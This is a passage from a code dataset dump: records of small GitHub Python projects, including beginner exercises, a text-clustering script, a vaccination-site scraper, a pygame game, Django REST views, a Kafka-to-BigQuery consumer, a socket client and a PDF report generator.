print(\"Century\",yy)\nelse:\n print(\"Please enter a valid value \")\n\n\n# # WHILE \n\n# In[ ]:\n\n\ni=0 \nwhile i !=5:\n print(\"value of i: \",i)\n i+=1\nprint(i ,\" equals 5\")\n\n\n# # ODD / EVEN\n\n# In[ ]:\n\n\na=0\nwhile a<11:\n a+=1\n islem=list(divmod(a,2))[1]\n if islem==0:\n print(\"{} is an even number\".format(a))\n elif islem==1:\n print(\"{} is an odd number\".format(a))\n continue\n\n\n# # FUNCTIONS \n\n# In[ ]:\n\n\ndef atoplambkare(a,b):\n atoplambkare= a**2 + 2*a*b + b**2\n return atoplambkare\n\n\n# # BOOLEAN FUNCTIONS\n\n# In[ ]:\n\n\nt = True\nf = False\nprint(type(t)) \nprint(t and f) \nprint(t or f) \nprint(not t) \nprint(t != f)\n\n","repo_name":"cmt-tr/Python_Basics","sub_path":"Alistirma.py","file_name":"Alistirma.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17298435841","text":"from scipy.cluster.vq import whiten\nfrom gensim.models import KeyedVectors\nfrom gensim.corpora.dictionary import Dictionary\nfrom sklearn.neighbors import KNeighborsClassifier\nimport pandas as pd\nimport numpy as np\nimport math\nfrom numpy.random import permutation\nimport time\nimport wmd\nimport os\n\ndirs = ['business', 'entertainment', 'politics', 
'sport', 'tech']\nfileCount = 0\ndocs = []\nfor folder in dirs:\n docs.append([])\n path = 'data/bbc/' + folder + '/'\n for filename in os.listdir(path):\n docs[len(docs) - 1].append(open(path + filename, \"r\").read())\n fileCount += 1\n # break\n if fileCount % 50 == 0:\n print('Processed ' + str(fileCount) + ' files')\n # break\nprint('Processed ' + str(fileCount) + ' files')\nprint('Preprocessing...')\n# preprocess data\nallWords = list()\nfor i in range(0, len(docs)):\n for j in range(0, len(docs[i])):\n docs[i][j] = wmd.preproc(docs[i][j])\n allWords += docs[i][j]\ndict = Dictionary(documents=[allWords])\n\n# create nbow vectors\nprint('Computing vectors...')\nvectors = list()\nfor i in range(0, len(docs)):\n for j in range(0, len(docs[i])):\n vector = whiten(KeyedVectors.nbow(docs[i][j], dict)) # whitening increases accuracy\n # vector = KeyedVectors.nbow(docs[i][j], dict)\n vector = np.append(vector, i) # add class column\n vectors.append(vector)\n\ndf = pd.DataFrame(vectors)\n# print('DATA FRAME:\\n' + str(df))\n\n# split data to train and test sets\nrandom_indices = permutation(df.index)\ntest_cutoff = math.floor(len(df) / 5) # 80:20 ratio\ntest_set = df.loc[random_indices[1:test_cutoff]]\ntrain_set = df.loc[random_indices[test_cutoff:]]\n\n# choose x and y sets (x - vectors columns; y - class)\nx_columns = list(range(0, len(vector) - 1))\ny_column = len(vector) - 1\n\n# CLUSTER (1-19 neighbors)\nfor n in range(1, 20):\n print(str(n) + ' neighbor(s):')\n knn = KNeighborsClassifier(n_neighbors=n)\n knn.fit(train_set[x_columns], train_set[y_column])\n predictions = knn.predict(test_set[x_columns])\n\n actual = test_set[y_column]\n rowCount = len(test_set)\n correctCount = 0\n for i in range(0, rowCount):\n if predictions[i] == actual._ndarray_values[i]:\n correctCount += 1\n\n print('Guessed ' + str(correctCount) + ' out of ' + str(rowCount) + ' (' + str(correctCount / rowCount) + '% accuracy)')\n mse = (((predictions - actual) ** 2).sum()) / len(predictions)\n print('Mean squared error: ' + str(mse))\n\n#####################################################\n\n# get data\n# print('reading data')\n# wmd.polish = False\n\n# if wmd.polish:\n# doc1 = open('data/wikipl1.txt', \"r\", encoding=\"utf8\").read()\n# doc2 = open('data/wikipl2.txt', \"r\", encoding=\"utf8\").read()\n# doc3 = open('data/wikipl3.txt', \"r\", encoding=\"utf8\").read()\n# sentence_obama = 'Prezydent przemawiał przed publicznością w Radomiu.'\n# sentence_president = 'Prezydent udzielił wywiadu reporterom w Gdańsku.'\n# else:\n# # doc1 = open('data/tech1.txt', \"r\", encoding=\"utf8\").read()\n# # doc2 = open('data/tech2.txt', \"r\", encoding=\"utf8\").read()\n# # doc3 = open('data/sport1.txt', \"r\", encoding=\"utf8\").read()\n# doc1 = open('data/wikien1.txt', \"r\", encoding=\"utf8\").read()\n# doc2 = open('data/wikien2.txt', \"r\", encoding=\"utf8\").read()\n# doc3 = open('data/wikien3.txt', \"r\", encoding=\"utf8\").read()\n# sentence_obama = 'Obama speaks to the media in Illinois'\n# sentence_president = 'The president greets the press in Chicago'\n\n# model = wmd.get_model()\n#\n# start = time.time()\n# wmd.dist(model, doc1, doc2)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, doc1, doc3)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, doc1, sentence_obama)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = 
time.time()\n# wmd.dist(model, sentence_president, sentence_obama)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n#\n# start = time.time()\n# wmd.dist(model, sentence_president, sentence_president)\n# print('Distance calculated in ' + str(time.time() - start) + ' seconds\\n')\n","repo_name":"tkaczmarz/word-embeddings","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2984800583","text":"# Parse vaccination site locations for Santa Clara County\n\n# Run manually: python3 -m location_parsers.santaclara\n\nimport os\nimport re\nimport urllib3\nfrom bs4 import BeautifulSoup\n\nfrom . import header_dict\nfrom . import County, Location\nfrom . import debug_print, validate\n\n\ncounty = County(\n name=\"Santa Clara\",\n url=\"https://vax.sccgov.org/home\",\n)\n\n\ndef address_fixup(a):\n \"\"\" Add missing zip codes \"\"\"\n\n a = a.replace(\n \"2542 Monterey Highway, Gate D, San Jose, CA\",\n \"2542 Monterey Highway, Gate D, San Jose, CA 95111\",\n )\n return a\n\n\n# Returns a list of Location objects\ndef run():\n http = urllib3.PoolManager(headers=header_dict)\n r = http.request(\"GET\", county.url)\n\n soup = BeautifulSoup(r.data, \"lxml\")\n\n span = soup.find(\"span\", string=\"Where would you like to be vaccinated?\")\n fieldset = span.find_parent(\"fieldset\")\n inputs = fieldset.find_all(\"input\")\n\n locations = []\n for i in inputs:\n label = i.parent.find(\"label\")\n name = label.string\n\n div = i.parent.find(\"div\")\n address = div.string\n address = address_fixup(address)\n\n if \", CA\" not in address:\n continue\n\n l = Location(name=name, address=address, county=county.name)\n locations.append(l)\n\n options = fieldset.find_all_next(\"option\")\n for o in options:\n if \", CA\" in o.string:\n name, address, extra = re.split(\"[\\(\\)]\", o.string)\n l = Location(name=name.strip(), address=address, county=county.name)\n locations.append(l)\n\n validate(locations)\n return locations\n\n\nif __name__ == \"__main__\":\n locations = run()\n debug_print(locations)\n","repo_name":"rajbot/vaccinebot","sub_path":"location_parsers/santaclara.py","file_name":"santaclara.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30479147966","text":"import pygame\nimport random\nimport time\nimport sys\n\nfrom playsound import playsound\n\npygame.init()\n\n# my variables being defined\nscreen = pygame.display.set_mode([875, 900])\n\nquality = \"\"\n\nstart = 0\n\nscore = 0\n\nquality_cords = [120,240,460,680]\n\nspawncords = [180,400,620,840]\n\nposition_praise = 400\n\nimage_up = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button1.png\")\nimage_down = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button3.png\")\nimage_right = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button2.png\")\nimage_left = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/button4.png\")\n\nimage_bg = pygame.image.load(\"/Users/aadya/Desktop/Code/python/rg/bg.png\")\n\nimage_ball = pygame.image.load(\"ball.png\")\n\nimagerect_up = image_up.get_rect()\nimagerect_down = image_down.get_rect()\nimagerect_right = image_right.get_rect()\nimagerect_left = image_left.get_rect()\n\nimagerect_up.right = 210\nimagerect_up.top = 570\n\nimagerect_down.right = 430\nimagerect_down.top = 570\n\nimagerect_right.right = 
650\nimagerect_right.top = 570\n\nimagerect_left.right = 870\nimagerect_left.top = 570\n\n\npygame.mixer.music.load(\"track\"+ str(random.randint(1,5))+ \".mp3\")\n\ndifficultyspeed = 1\n\nmyfont = pygame.font.SysFont(\"Cookies\", 85)\n\n# defining functions\n\ndef game_menu():\n\n pygame.display.set_caption('POPstefanija')\n pygame.display.flip()\n\ndef spawn_ball():\n global imagerect_ball\n imagerect_ball = image_ball.get_rect()\n imagerect_ball.right = random.choice(spawncords)\n imagerect_ball.top = 100\n\nrunning = True\n\nspawn_ball()\ngame_menu()\n\n#game loop\n\n\npygame.mixer.music.play(loops = -1)\n\nwhile running:\n screen.blit(image_bg, (0, 0))\n\n screen.blit(image_up, imagerect_up)\n screen.blit(image_down, imagerect_down)\n screen.blit(image_right, imagerect_right)\n screen.blit(image_left, imagerect_left)\n\n streak = myfont.render(\"streak: \" + str(score) + \"!\",1, (176,67,33))\n screen.blit(streak,(0,0))\n\n praises = myfont.render( quality ,1, (176,67,33))\n screen.blit(praises,(position_praise,120))\n\n #pygame.mixer.Sound(\"/Users/aadya/Desktop/theme.mp3\").play()\n #pygame\n\n try:\n imagerect_ball = imagerect_ball.move(0,difficultyspeed)\n screen.blit(image_ball, imagerect_ball)\n except:\n pass\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # Whenever a key is pressed down\n elif event.type == pygame.KEYDOWN:\n\n pygame.mixer.Sound(\"/Users/aadya/Desktop/Code/python/rg/pop.mp3\").play()\n pygame\n position_praise = random.choice(quality_cords)\n\n start = time.time()\n # W -> Up; S -> Down; A -> Left; D -> Right\n if (event.key == pygame.K_UP or event.key == ord('w')) and imagerect_ball.right == 180:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n print(\"Bad!\")\n quality = (\"bad!\")\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_DOWN or event.key == ord('s')) and imagerect_ball.right == 400:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_RIGHT or event.key == ord('d')) and imagerect_ball.right == 620:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if (event.key == pygame.K_LEFT or event.key == ord('a')) and imagerect_ball.right == 840:\n if imagerect_ball.bottom > 590 and imagerect_ball.bottom < 760:\n imagerect_ball = None\n quality = (\"good!\")\n difficultyspeed += 0.5\n score = score + 1\n else:\n imagerect_ball = None\n quality = (\"bad!\")\n difficultyspeed = 1\n score = 0\n print(\"Streak:\", score)\n spawn_ball()\n\n if event.key == pygame.K_ESCAPE:\n pygame.event.post(pygame.event.Event(pygame.QUIT))\n\n if time.time() - start >= 0.2:\n quality = \"\"\n pygame.display.update()\n\n\n if imagerect_ball.top > 900:\n pygame.quit()\n print (\"GAME OVER!\")\n break\n\n#end of while loop\n\n#end of 
code\n","repo_name":"Kawaiicutieuwu/Aadya-Rhythm-Game-POPstefanija-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43410354483","text":"#3 - Escreva um programa que recebe três inteiros como entrada do teclado e \r\n# escreva na tela a média, a soma, o produto, o menor valor e o maior valor, \r\n# usando uma linha para cada resultado.\r\n\r\na = int(input(\"Digite o primeiro valor:\"))\r\nb = int(input(\"Digite o segundo valor:\"))\r\nc = int(input(\"Digite o terceiro valor:\"))\r\nmaior = a\r\nif b > a and b > c:\r\n maior = b\r\nif c > a and c > b:\r\n maior = c\r\nmenor = a\r\nif b < c and b < a:\r\n menor = b\r\nif c < b and c < a:\r\n menor = c\r\n\r\nsoma = a + b + c \r\nmedia = soma /3\r\n\r\nprint (f\"O valor da Media é: {int(media)}\")\r\nprint (f\"A soma dos 3 numeros são: {soma}\")\r\nprint(f\"O menor número digitado foi {menor}\")\r\nprint(f\"O maior número digitado foi {maior}\")","repo_name":"gerinwz/Python","sub_path":"Atividade de operações aritimetica e lógica/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29117800837","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework import filters\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.settings import api_settings\nfrom rest_framework.permissions import IsAuthenticated\nimport requests\nimport json\nimport ast\n\nfrom profiles_api import serializers\nfrom profiles_api import models\nfrom profiles_api import permissions\n\nfrom django.http import JsonResponse\n\n\n\nclass SearchView(APIView):\n \"\"\"Search API View\"\"\"\n serializer_class = serializers.SearchSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n \"\"\"Return searched data\"\"\"\n serializer = self.serializer_class(data=request.data)\n sort_dict = {1:'createdAt', 2:'popularityValue', 3: 'vote'}\n\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n query = serializer.validated_data.get('query')\n sort_value = sort_dict[serializer.validated_data.get('sort')]\n page = serializer.validated_data.get('page')\n limit = serializer.validated_data.get('limit')\n\n r = requests.post('http://30ec-64-98-208-143.ngrok.io/search', json = {'query' : query})\n feeds = r.json()['Data']\n # feeds = []\n\n if request.user.is_authenticated:\n user = request.user\n favorites = user.favorites\n voted = user.voted\n\n if favorites:\n favorites = json.loads(favorites) if favorites != \"\" else [] # string to list\n for obj in feeds:\n if obj['id'] in favorites:\n obj['favorite'] = 1\n\n if voted:\n voted = json.loads(voted) if voted != \"\" else {} # string to json\n print(voted)\n for obj in feeds:\n if str(obj['id']) in list(voted.keys()):\n obj['voted'] = voted[str(obj['id'])]\n\n\n\n sorted_list = sorted(feeds, key=lambda d: d[sort_value])\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success', 'Data' : sorted_list[page : page + limit + 1]}, status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n # return 
Response({\"msg\" : 'success', 'Data' : feeds })\n\n\nclass UserLikeView(APIView):\n \"\"\"Update Like API View\"\"\"\n serializer_class = serializers.UserLikeSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n\n # 401 error\n if request.user.is_authenticated is False:\n return Response(\n {\"statusCode\" : 401, \"msg\" : \"Unauthorized error\"}\n )\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n new_favorite_id = serializer.validated_data.get('feed_id') # int\n\n if new_favorite_id is None:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n user = request.user\n user_favorites = json.loads(user.favorites) if user.favorites != \"\" else []\n\n if new_favorite_id in user_favorites:\n user_favorites.remove(new_favorite_id)\n else:\n user_favorites.append(new_favorite_id)\n\n user.favorites = json.dumps(user_favorites)\n user.save()\n\n # to do : post like change value to flask server or external DB shared with flask server\n\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success'},status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n # return Response({\"statusCode\" : 200, 'msg' : 'success'})\n\n\nclass UserVoteView(APIView):\n \"\"\"Update favorites, voted API View\"\"\"\n serializer_class = serializers.UserVoteSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n\n # 401 error\n if request.user.is_authenticated is False:\n return Response(\n {\"statusCode\" : 401, \"msg\" : \"Unauthorized error\"}\n )\n\n # 400 error\n if serializer.is_valid() is False:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n feed_id = serializer.validated_data.get('feed_id')\n vote = serializer.validated_data.get('vote')\n\n if feed_id is None or vote is None:\n return Response(\n {\"statusCode\" : 400, \"msg\" : \"Bad request error\"}\n )\n\n user = request.user\n user_voted = voted = json.loads(user.voted) if user.voted != \"\" else {}\n user_voted[str(feed_id)] = vote\n user.voted = json.dumps(user_voted)\n\n # to do : post vote change value to flask server or external DB shared with flask server\n\n user.save()\n\n response = JsonResponse( {\"statusCode\" : 200, 'msg' : 'success'},status=200)\n response[\"Access-Control-Allow-Origin\"] = \"*\"\n return response\n\n # return Response({\"statusCode\" : 200, 'msg' : 'success'})\n\n\nclass UserProfileViewSet(viewsets.ModelViewSet):\n \"\"\"Handle creating and updating profiles\"\"\"\n serializer_class = serializers.UserProfileSerializer\n queryset = models.UserProfile.objects.all()\n authentication_classes = (TokenAuthentication,)\n permission_classes = (permissions.UpdateOwnProfile,)\n filter_backends = (filters.SearchFilter,)\n search_fields = ('name', 'email',)\n\n\nclass UserLoginApiView(ObtainAuthToken):\n \"\"\"Handle creating user authentication tokens\"\"\"\n renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES\n\n\nclass UserProfileFeedViewSet(viewsets.ModelViewSet):\n \"\"\"Handles creating, reading and updating profile feed items\"\"\"\n authentication_classes = (TokenAuthentication,)\n serializer_class = serializers.ProfileFeedItemSerializer\n queryset = models.ProfileFeedItem.objects.all()\n permission_classes = (permissions.UpdateOwnFeed, IsAuthenticated)\n\n 
def perform_create(self, serializer):\n \"\"\"Sets the user profile to the logged in user\"\"\"\n serializer.save(contentContributorId=self.request.user)\n","repo_name":"recorder12/ssmh_backend","sub_path":"profiles_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"10015734239","text":"from kafka import KafkaConsumer\nimport json\nfrom google.cloud import bigquery\nfrom google.oauth2 import service_account\n\n\ncredentials = service_account.Credentials.from_service_account_file('/Users/gangsickmun/kafkaDocker/finalproject1-393400-9fef84669d36.json')\nclient = bigquery.Client(credentials=credentials)\ntable_id = \"finalproject1-393400.user_log.kafkabig\"\n\n# Create a consumer for Kafka processing\nconsumer = KafkaConsumer(\n 'user_log2',\n bootstrap_servers=['34.64.190.98:9092', '34.64.190.98:9093', '34.64.190.98:9094'],\n value_deserializer=lambda x: json.loads(x.decode('utf-8'))\n)\n# Function that processes log data and stores it in BigQuery\ndef insert_data_bigquery(log_data):\n errors = client.insert_rows_json(table_id, [log_data])\n if errors == []:\n print(\"New rows have been added.\")\n else:\n print(\"The following errors occurred: \", errors)\n\nfor msg in consumer:\n log_data = msg.value\n insert_data_bigquery(log_data)\n","repo_name":"happymoon1205/kafka_cluster","sub_path":"consumer_big.py","file_name":"consumer_big.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32805301261","text":"import fibonacci\nimport argparse\n\n\n\ndef main():\n # define arguments\n parser = argparse.ArgumentParser(description='Fibonacci calculator.', prog='docker run --rm [IMAGE NAME]')\n parser.add_argument('--calc', type=int, default=10, help='how many fibonacci numbers should be printed out in the sequence')\n parser.add_argument('--check', type=int, help='identify whether a number is part of the fibonacci sequence or not')\n parser.add_argument('--verbose', '-v', action='count')\n args = parser.parse_args()\n\n verbose_level = 0\n if args.verbose is not None:\n verbose_level = args.verbose\n\n \n if args.check is not None:\n user_input = args.check\n fibonacci_result = fibonacci.check_number(user_input)\n print_fibonacci_result(fibonacci_result, verbose_level)\n \n elif args.calc is not None:\n user_input = int(args.calc)\n # calculate Fibonacci sequence\n sequence = fibonacci.sequence_calc(user_input)\n # reverse sequence and print it\n sequence.reverse()\n print_out(sequence, verbose_level)\n\n\n\n\ndef print_out(data_list, verbose_level = 0, glue = \"\\n\"):\n # Print data with glue/separator\n if verbose_level == 0:\n # just print elements normally\n output = glue.join(map(str, data_list))\n print(output)\n else:\n # Print with index number in debug mode\n location = len(data_list)\n for number in data_list:\n print(\"#{0}: {1}\".format(location, number))\n location -= 1\n\n\ndef print_fibonacci_result(result, verbose_level):\n if result[0] == True:\n if verbose_level == 0:\n print(\"1\")\n else:\n print(\"True: This number is #{0} in the Fibonacci sequence\".format(result[1]))\n else:\n if verbose_level == 0:\n print(\"0\")\n else:\n print(\"False: Unfortunately this number is NOT in the Fibonacci sequence\")\n\n\n\nif __name__ == \"__main__\":\n 
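# Example invocations (assuming the local fibonacci module's sequence_calc /\n # check_number behave as their names suggest):\n # python app.py --calc 10 -v -> first 10 Fibonacci numbers, one \"#index: value\" per line\n # python app.py --check 21 -> prints 1, since 21 is in the sequence\n 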
main()\n","repo_name":"irajtaghlidi/fibonacci-calculator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8314330765","text":"import socket, sys, os, threading, time\nfrom _thread import *\nimport random\n\n#global\n# port = 8001\n# host = \"localhost\"\nbuffer_size = 4096\n\n#connection\ndef client_socket_creation(server_host, server_port):\n\n clientsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n #connection\n try:\n clientsocket.connect((server_host,server_port))\n except:\n print(\"error in connecting to server !\")\n exit()\n\n msg = \"Hello from client !\"\n clientsocket.send(msg.encode())\n msg = clientsocket.recv(buffer_size).decode()\n # print(msg,\"Connection established!\")\n while True:\n # msg = input(\"Enter msg: \")\n msg = str(random.randint(1,1000))\n # print(msg)\n clientsocket.send(msg.encode())\n msg = \"\"\n msg = clientsocket.recv(buffer_size).decode()\n # print(msg)\n\n time.sleep(1)\n\n clientsocket.close()\n\n\n#functions\nif __name__ == \"__main__\":\n # command line argument 'host:port'\n arg_list = sys.argv\n # print(arg_list)\n\n server_host = \"127.0.0.1\"\n server_port = 9000\n if len(arg_list) > 1:\n server_host_port = arg_list[1].split(\":\")\n server_host = server_host_port[0]\n server_port = int(server_host_port[1])\n # print(host,port)\n\n # thread for creating client socket\n t1 = threading.Thread(target = client_socket_creation,args=(server_host,server_port, ))\n\n t1.start()","repo_name":"ronitray95/distributed_iot_app_deployment_platform","sub_path":"Team_specific_codes/Team1/Hackathon1/SensorManager/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23840903162","text":"import csv, glob, base64, ntpath, re, shutil, datetime\nfrom os import listdir, path\nfrom reportlab.pdfgen import canvas\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport time\nimport numpy as np\nfrom PIL import Image\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\nclass ReportCreator(object):\n\t'''\n\tClass allows for downloading, parsing, and reporting of individual factories, as well as portfolio-level\n\treporting which includes all factories.\n\n\tAssumptions:\n\t- Individual file naming convention: [Factory Name] - [Month] [Year].csv\n\t- List of factories will always be provided in FactoryAttributes.csv <--this is the only necesary input besides month/year\n\n\t'''\n\tdef __init__(self, factory_attributes_file):\n\t\t'''\n\n\t\t:param factory_attributes: a file containing the list of factories\n\t\t:param year: 4-digit integer\n\t\t:param month: integer from 1-12 inclusive\n\t\t'''\n\t\tself.factory_attributes_file = factory_attributes_file\n\t\tself.raw_data_dir = path.join(path.split(self.factory_attributes_file)[0], 'raw_data')\n\t\tself.all_raw_data = [f for f in listdir(self.raw_data_dir) if path.isfile(path.join(self.raw_data_dir, f))]\n\t\tself.outputs_dir = path.join(path.split(self.factory_attributes_file)[0], 'outputs')\n\t\tself.graphs_dir = path.join(self.outputs_dir, 'graphs')\n\n\t\tself.months = []\n\n\t\t# list of factory attributes dictionaries.\n\t\t# Data Definition:\n\t\t# List of Dictionaries\n\t\t# Dictionaries have 3keys:\n\t\t# - Factory\n\t\t# - Year Built\n\t\t# - SqFootage\n\t\tself.factory_attributes = []\n\n\t\t# list of factory names, filled 
in later\n\t\tself.factories = []\n\n\t\t# holds final numbers by factory\n\t\t# Keys:\n\t\t# - Factory Name [String]\n\t\t# Value: Dictionary\n\t\t# Keys:\n\t\t# - Average demand\n\t\t# - Average demand per square foot\n\t\t# - Total demand\n\t\t# - Peak demand\n\t\tself.factory_outputs = {}\n\n\t\t# holds portfolio outputs by month\n\t\t# Key: Month [String]\n\t\t# Value: Dictionary\n\t\t# Keys: same as factory_outputs\n\t\tself.portfolio_outputs = {}\n\n\n\tdef get_factory_attributes(self):\n\t\t'''\n\t\tfills in the self.factories from the given file\n\t\t:return:\n\t\t'''\n\t\twith open(self.factory_attributes_file, newline='') as csvfile:\n\t\t\treader = csv.DictReader(csvfile)\n\n\t\t\tfor row in reader:\n\t\t\t\tself.factory_attributes.append(row)\n\n\t\treturn\n\t\t# comment this out, reference only\n\t\tfor factory in self.factory_attributes:\n\t\t\tprint(\"Factory Name:\", factory['Factory'])\n\t\t\tprint(\"Year Built:\", factory['Year Built'])\n\t\t\tprint(\"SqFootage:\", factory['SqFootage'])\n\n\tdef create_all_reports(self):\n\t\t'''\n\t\t1. loops through the list of factories\n\t\t2. grabs list of data files for that factory\n\t\t3. loop through data files and sends raw data to method to generate monthly reports\n\t\t:return:\n\t\t'''\n\t\tself.raw_data_dir = path.join(path.split(self.factory_attributes_file)[0],'raw_data')\n\t\tself.all_raw_data = [f for f in listdir(self.raw_data_dir) if path.isfile(path.join(self.raw_data_dir,f))]\n\n\t\tfor factory in [factory['Factory'] for factory in self.factory_attributes]:\n\t\t\tlist_of_raw_data = [f for f in self.all_raw_data if factory in f]\n\t\t\tself.create_factory_report(factory,list_of_raw_data)\n\n\n\tdef create_factory_report(self, factory, raw_data_files):\n\t\t'''\n\n\t\t:param factory: String of the factory name\n\t\t:param raw_data_files: a list of raw data file names [String]\n\t\t:return:\n\t\t'''\n\t\tfactory_year_built = [x['Year Built'] for x in self.factory_attributes if x['Factory'] == factory][0]\n\t\tfactory_sq_footage = [x['SqFootage'] for x in self.factory_attributes if x['Factory'] == factory][0].replace(',','')\n\n\t\tself.factory_outputs[factory] = {}\n\n\t\t# create pdf\n\t\tfilename = path.join(self.outputs_dir, factory + ' Summary.pdf')\n\t\tdoctitle = factory + 'Summary'\n\t\ttitle = factory\n\t\tsubtitle = 'Built in ' + str(factory_year_built)\n\n\t\t# Factory level summary page\n\t\tpdf = canvas.Canvas(filename)\n\t\tpdf.setFont('Helvetica-Bold', 36)\n\t\tpdf.setTitle(doctitle)\n\t\tpdf.drawCentredString(290, 720, title)\n\t\tpdf.setFontSize(24)\n\t\tpdf.drawCentredString(290, 690, subtitle)\n\t\tpdf.save()\n\n\t\t# accumulators for portfolio-level reporting\n\t\tport_total_kwh = 0\n\t\tport_total_sq_feet = 0\n\t\tport_peak_demand = 0\n\n\t\tfor raw_data_file in raw_data_files:\n\t\t\tfile_full_path = path.join(self.raw_data_dir, raw_data_file)\n\t\t\tm = re.search('(.*) - (.*) (.*)\\.csv',raw_data_file)\n\t\t\tmonth = m.group(2)\n\t\t\tyear = m.group(3)\n\n\t\t\tself.factory_outputs[factory][year] = {}\n\t\t\tself.factory_outputs[factory][year][month] = {}\n\n\t\t\theaders = ['Day', 'Electricity Usage (kWh)']\n\t\t\tdf = pd.read_csv(file_full_path, header=0, names=headers)\n\n\t\t\tx = df['Day']\n\t\t\ty = df['Electricity Usage (kWh)']\n\n\t\t\tself.factory_outputs[factory][year][month]['average demand'] = df['Electricity Usage (kWh)'].mean()\n\t\t\tself.factory_outputs[factory][year][month]['average demand per square foot'] = df['Electricity Usage 
(kWh)'].mean()/float(factory_sq_footage)\n\t\t\tself.factory_outputs[factory][year][month]['total demand'] = df['Electricity Usage (kWh)'].sum()\n\t\t\tself.factory_outputs[factory][year][month]['peak demand'] = df['Electricity Usage (kWh)'].max()\n\n\t\t\tplt.title(factory + ' - ' + month + ' ' + year)\n\t\t\tplt.plot(x,y)\n\t\t\tplt.xlabel('Day')\n\t\t\tplt.ylabel('Electricity Usage (kWh)')\n\t\t\tplt.savefig(path.join(self.graphs_dir, factory + \" \" + month + \" \" + year + \".pdf\"))\n\t\t\tplt.close()\n\n\t\t# after creating the JPGs of the plots, put them into the pdf file\n\t\treturn\n\n\tdef create_portfolio_report(self):\n\t\t'''\n\t\tcreates a portfolio-level summary report\n\t\t:return:\n\t\t'''\n\n\t\t# create list of all files including paths\n\t\tall_file_paths = [path.join(self.raw_data_dir, f) for f in self.all_raw_data]\n\t\tmonths = [f for f in self.all_raw_data]\n\t\t'''\n\t\tself.portfolio_outputs[year][month]\n\t\tself.portfolio_outputs[year][month]['average demand']\n\t\tself.portfolio_outputs[year][month]['average demand per square foot']\n\t\tself.portfolio_outputs[year][month]['total demand']\n\t\tself.portfolio_outputs[year][month]['peak demand']'''","repo_name":"elijahbotkin/tech-assignment","sub_path":"blast_off/report_creator.py","file_name":"report_creator.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} 